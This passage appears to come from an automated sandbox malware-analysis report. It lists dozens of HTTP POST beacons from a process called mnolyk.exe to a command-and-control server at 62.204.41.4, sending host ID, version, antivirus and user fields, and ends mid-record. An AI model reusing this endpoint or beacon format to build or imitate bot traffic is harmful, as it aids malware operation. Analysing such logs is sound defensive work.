                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        372 | 192.168.2.5 | 50062 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:28.208950043 CET | 573 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.272694111 CET | 573 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        373 | 192.168.2.5 | 50063 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:28.448525906 CET | 574 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.513607979 CET | 574 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        374 | 192.168.2.5 | 50064 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:28.682743073 CET | 575 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.748486042 CET | 575 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        375 | 192.168.2.5 | 50065 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:28.913263083 CET | 576 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.978040934 CET | 576 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        376 | 192.168.2.5 | 50066 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:29.146656990 CET | 577 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:29.211658955 CET | 577 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        377 | 192.168.2.5 | 50067 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:29.442348003 CET | 578 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:29.506154060 CET | 578 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        378192.168.2.55006862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:29.946527004 CET579OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:30.012849092 CET579INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        379192.168.2.55006962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:30.250801086 CET580OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:30.317364931 CET580INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        38192.168.2.54972862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:43.785939932 CET238OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.092256069 CET239OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:44.158833027 CET239INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        380192.168.2.55007062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:30.493721008 CET581OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:30.560586929 CET581INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        381192.168.2.55007162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:31.256999969 CET582OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:31.321892023 CET582INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        382192.168.2.55007262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:31.495682955 CET583OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:31.560380936 CET583INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        383192.168.2.55007362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:32.799221992 CET584OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:32.869652987 CET584INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        384192.168.2.55007462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.054157972 CET585OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.121211052 CET585INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        385192.168.2.55007562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.288721085 CET586OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.352719069 CET586INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        386192.168.2.55007662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.527817011 CET587OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.590672016 CET587INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        387192.168.2.55007762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.758095980 CET588OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:33.822932005 CET588INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        388192.168.2.55007862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:33.994127989 CET589OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.060539007 CET589INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        389192.168.2.55007962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:34.225155115 CET590OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:34.289185047 CET590INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        39192.168.2.54972962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:44.339848995 CET240OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
